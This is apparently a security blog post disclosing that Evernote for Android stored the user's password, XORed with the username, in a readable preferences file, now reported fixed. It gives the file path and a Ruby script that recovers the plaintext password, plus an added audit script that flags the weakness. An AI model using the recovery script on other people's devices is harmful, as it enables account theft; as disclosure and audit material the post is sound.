Update: Evernote has reported that this issue has been addressed.
Evernote for Android stores various settings in an XML file. That file isn’t really protected: it’s easily readable, especially if an attacker is able to get physical access to a device. What’s worse, it contains the user’s credentials.
/data/data/com.evernote/shared_prefs/com.evernote_preferences.xml
The username is located in the <string name="username"> element, and the password is stored in <string name="encrypted_password">. From the name you’d assume that the password is actually encrypted. You’d be wrong.
The password is simply XORed with the username, making recovery simple.
Here’s a simple script to “decrypt” the password:
#!/usr/bin/env ruby
##
# Copyright 2013 Adam Caudill <adam@adamcaudill.com>
#
# Decodes Evernote password recovered from Evernote for Android config file:
# File: /data/data/com.evernote/shared_prefs/com.evernote_preferences.xml
# (may also be in <userid>.prof.xml if missing from com.evernote_preferences.xml)
# Password: <string name="encrypted_password">
# Username: <string name="username">
##
require "base64"

if ARGV.count != 2
  puts 'Usage: ./evernote_pass_decode.rb <pass> <username>'
  exit 1
end

# The stored value is Base64; underneath it is the password XORed with the username.
pass = Base64.decode64(ARGV[0])
user = ARGV[1].bytes
final = ''

# XOR each byte with the username byte at the same position, repeating the username as needed.
pass.bytes.each_with_index do |byte, index|
  final += (byte ^ user[index % user.length]).chr
end

puts "Password: #{final}"
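For reviewing an app's own preferences file, the same weakness can be checked for without recovering anything. The following is an added example, not part of the original post or Evernote's code: it flags secret-looking `<string>` entries and reports when one is just another value in the same file XORed over the secret. The name pattern, function names and sample file are assumptions constructed for illustration, and the printable-ASCII test is a heuristic.

```ruby
require "base64"

SECRET_NAME = /pass|secret|token|credential/i   # assumed naming heuristic

# Repeating-key XOR over raw bytes, the scheme the post describes.
def xor_bytes(data, key)
  k = key.bytes
  data.bytes.each_with_index.map { |b, i| b ^ k[i % k.length] }
end

# Constructed sample in the shared_prefs layout; all values are made up.
SAMPLE_USER = "alice@example.com"
SAMPLE_BLOB = Base64.strict_encode64(xor_bytes("Tr0ub4dor&3", SAMPLE_USER).pack("C*"))
SAMPLE_PREFS = <<~XML
  <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
  <map>
      <string name="username">#{SAMPLE_USER}</string>
      <string name="encrypted_password">#{SAMPLE_BLOB}</string>
      <string name="last_sync">2013-01-01</string>
  </map>
XML

# Collect <string name="...">value</string> entries (simple, non-nested values only).
def string_prefs(xml)
  xml.scan(/<string name="([^"]+)">([^<]*)<\/string>/).to_h
end

# Report each secret-looking entry and, if its Base64 payload becomes printable
# ASCII when XORed with another value in the same file, the name of that value.
# The recovered text is deliberately not returned; only the finding is.
def audit_prefs(xml)
  prefs = string_prefs(xml)
  prefs.select { |name, _| name =~ SECRET_NAME }.map do |name, value|
    raw = Base64.strict_decode64(value) rescue nil
    hit = raw && !raw.empty? && prefs.find { |other, candidate|
      other != name && !candidate.empty? &&
        xor_bytes(raw, candidate).all? { |b| b.between?(0x20, 0x7e) }
    }
    { name: name, xor_key_field: hit ? hit.first : nil }
  end
end

audit_prefs(SAMPLE_PREFS).each do |f|
  puts "#{f[:name]}: " + (f[:xor_key_field] ? "XOR of '#{f[:xor_key_field]}', not encryption" : "stored secret")
end
```

Any finding means the credential is stored on the device in recoverable form; a non-nil `xor_key_field` means the key is stored right beside it.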